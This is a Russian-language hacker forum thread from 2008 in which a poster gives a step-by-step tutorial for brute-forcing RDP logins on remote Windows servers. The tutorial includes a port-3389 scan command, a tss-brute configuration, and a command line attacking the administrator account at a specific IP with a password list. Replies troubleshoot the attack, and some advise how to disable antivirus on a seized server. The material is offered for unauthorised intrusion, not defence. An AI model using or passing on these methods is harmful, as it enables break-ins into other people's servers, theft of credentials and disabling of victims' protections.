Брут дедиков [by Capcha]

[Capcha]

Расскажу вам как брутить дедики моим старым способом.

ЧТО НУЖНО??

1. Нам нужен VNC_Byauth сканер (В аттаче).
2. Нужен tss-brute (В аттаче).
3. Нужен мой скрипт на PHP для генерации BAT файлов (Смотрим в аттаче).
4. Прога от RankroR'a для выдирания гудов ,которую он делал спец. для меня качаем (В аттаче).
6. RDP 5.1 (В аттаче).
6. Как всегда руки.
7. Мозг тоже пригодится.

Начнём!!

1. Открываем cmd.exe (WIN+R), запускаем VNC_Byauth c параметрами -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT -T Кол-во потоков

2. После того как сканер просканил смотрим его лог в блокноте , удаляем из списка :3389 порт оставив просто список IP адресов.

3. Ставим мой скрипт на хост или на localhost и вставляем туда наши айпишнеги и другие данные.

4. После того как скрипт выполнил своё дело создаём в папке с нашим tss-brute.exe , BAT файл и вставляем в него результат полученый после выполнения скрипта.

5. Заходим в файл smclient.ini который шол вместе с tss-brute.exe и вставляем туда мой конфиг

Код:

[dlls]
tshare=tclient.dll
;check=tclient.dll
;rs232=rs232kbd.dll
[tclient]
;timeout=120
;contimeout=20
StartRun=ShutDown...
StartRunAct=r
RunBox=Typethenameofaprogram
WinLogon=Options<<
;WinLogonAct=\x\&u\&
WinLogonAct=\&u\&
PriorWinLogon=Options>>
PriorWinLogonAct=\&o\&
NTSecurity=ShutDownWindows
NTSecurityAct=\p\p\p\p\p\l
SureLogoff=Logoff
SureLogoffAct=\n
StartLogoff=\p\p\p\p\p\72\*72\n
LogonErrorMessage=LogonMessage
LogonDisabled=Remoteloginsarecurrentlydisabled
LowSpeed=0
PersistentCache=1
;FullScreen=1
;UIClientCaption=Terminal Server Client
;UIDisconnectDialogBox=Terminal Services Client Disconnected
;UIYesNoDisconnect=Disconnect Windows session
ClientImage=mstsc.exe
[clx]
verbose=1
;GlyphEnable=1

и сохраняем.

6. Создаём в той же папке где лежит наш BAT фаил папку которую вы вписывали в скрипте(ОБЯЗАТЕЛЬНО!!!!)

7. После выполнения Брута заходим в нашу папку(см п.6) и вставляем в него программу от Rankor'а. Создаём папку output и вней output.txt

8. Вписываем в программе success , если хоть один дед сбручен программа вам покажет это, если что-то сбрутилось то смотри output.txt там вы увидите IP адресс деда и пароль.

9. Заходим в MSTSC (тобиш RDP) и проверяем наши деды ;)

10. Фсё на этом я закончил если что-то не ясно задаём вопросы тут ))

Для тех у кого не работает брут:

1. Если у вас после запуска бат файла не появляется окно РДП клиента, а запрос на ввод пароля и логина, то скачайте 5версию MSTSC и установите её в безопасном режиме.

2. Если у вас загружается окно РДП клиента, но не происходит подбор паролей, попробуйте отключить брэндмауэр. Иногда брут не может выполнять свои действия если язык на дедике не Англиский.

3. Если не происходит подбор паролей, то поменяйте в панели управления язык по умолчанию на Англиский.

3. Если у вас не работает мой скрипт (если выводит лишние слэши) , это значит что вы не залили .htaccess который идёт вместе с моим скриптом, если так и не получилось запустить, то воспользуйтесь ссылкой которая ниже на полностью работающий сайт с моим скриптом.

Спецально для тех кому не хочется парить мозг с моим скриптом RankoR написал программу для генерирования батников, качаем тут http://forum.asechka.ru/showpost.php...&postcount=270

ТЕМА ОБНОВЛЕНА, ФАЙЛЫ ЗАЛИТЫ В АТТАЧ

!!!!Т.К. МНОГИЕ НЕ ЗНАЮТ ЧТО ТАКОЕ ПХП И КАК ЕГО КУШАТЬ, РАНКОР НАПИСАЛ ПРОГУ СПЕЦ
КАЧАЕМ ЕПТА!!!!

VIDEO F.A.Q

Конечно же отдельное спасибо metal'у за его софтину (tss-brute)
(c) Capcha [07.08.2008] Special For Asechka.ru

Копирования статьи только с разрешения автора.

[zazaza]

Дайте плз ссылку на сайт с ip адресами по странам

[$Atlet$]

S+eam, посмотри выше тсс уже раз 100 перезаливали

[[san-off]]

Цитата:

Сообщение от zazaza

Дайте плз ссылку на сайт с ip адресами по странам

http://www.proxyserverprivacy.com/ipaddress_range.php

[War1og]

почёму, года я открываю уже созданный мною бат, идёт не подключение и брут, а простов коммандной строке быстро пролистывается всё, что было в *.bat

[krobol]

что-то неправильно указал - проверь всё, пути к программам

[War1og]

папку logs не создал...

теперь создал, открывается cmd, подключение ,появляется usr name;password... а брут не идёт!!!!!!!!

[krobol]

пойдёт, жди - если не английский язык, то долго тормозит

[War1og]

ААА... не идёт брут и всё... ну что не так?

Цитата:

"D:\hack\ded\brute_by_spayder\ tss-brute.exe" -w "D:\hack\ded\brute_by_spayder\ pass.txt" -u administrator 217.139.5.51 >>logs/217.139.5.51.txt

тсс скачивал тут, папка пасс на месте и в ней есть пасы.

з.ы. на будущее: как сделать, чтобы не запрашивало каждый раз "подключить"

[krobol]

у тебя должен стоять по умолчанию английский язык

чтобы не спрашивало подключить - поставь исключение в брандмауере windows на tss-brute

[War1og]

английский язык - по умолчанию
tss-brute - исключение в брандмауере(а ваще он выключен)
установил - 5 версию MSTSC (for XP)
----
всё равно брут не идёт

[shocker]

установи рдп 5 через безопасный режим и поставь атрибуты только чтение

[Analog]

на первых пунктах проблема уже.
после скана VNC и status:100% никаких логов не появляется рядом с файлом. почему ?

[War1og]

Цитата:

установи рдп 5 через безопасный режим и поставь атрибуты только чтение

просьба разъяснить поподробней, что это значит...

[BuG_4F]

Цитата:

Сообщение от War1og

просьба разъяснить поподробней, что это значит...

Скачай пятую версию рдп ! Установи её (пятую версию рдп) через безопасный режим !!! И в свойствах поставь галочку - ТОЛЬКО ЧТЕНИЕ !

[...vamp]

War1og, если ты этого не понимаешь,то куда тебе дедики брутить...

[shocker]

Цитата:

Сообщение от Analog

на первых пунктах проблема уже. после скана VNC и status:100% никаких логов не появляется рядом с файлом. почему ?

файл появляется в C:\Documents and Settings\Имя пользователя\

[Analog]

shocker,благодарю!

а нельзя как-нибдуь вырубить системный динамик ? а то пищит при вводе неправильных паролей на некоторых дедах.
и можно ли-какнибудь довести до автоматизма ? нередко все таки встречаются деды с языками отличными от английского.
а так же иногда бывает вообще ничего автоматически не вводится, если даже язык интерфейса английский.

но в целом неплохая система.

[shocker]

Цитата:

Сообщение от Analog

а нельзя как-нибдуь вырубить системный динамик ? а то пищит при вводе неправильных паролей на некоторых дедах.

всегда пищит на серверах вин2к, на других не наблюдал

[Analog]

достался дедик, симантек удаляет мои файлы.
в настройки симантека зайти не могу - логин\пас просит.
вроде у них это по умолчанию всегда есть - не подскажите ?
если никак не удасться войти в настройки, то что можно еще сделать ?

[BuG_4F]

Analog,
Попробуй через службы вырубить ...

[ShtepselSPB]

Analog, http://letmegooglethatforyou.com/?q=...BD%D0%B8%D1%8E

[Analog]

BuG_4F,пробовал. все службы перевел вырубил и останавливал (пока не перезагружался правдо, но службы остановились)

ShtepselSPB, пробовал..

если ниче не придумаю - убью пути в реестере на антивир,может пароли собьются\убируться

[destrit]

такой вопрос винда пропатчина на многопоточность но пир скане диапов количество потоков больше 300 не поднимается что делать

[BuG_4F]

destrit,
Значит у тебя канал ~500 Кбит ...

[destrit]

еше такой вопрос после брута при поиске нашло деде с валидным паролем но пир входе там было это

пробывал подобрать но увы и вообще подскажите что это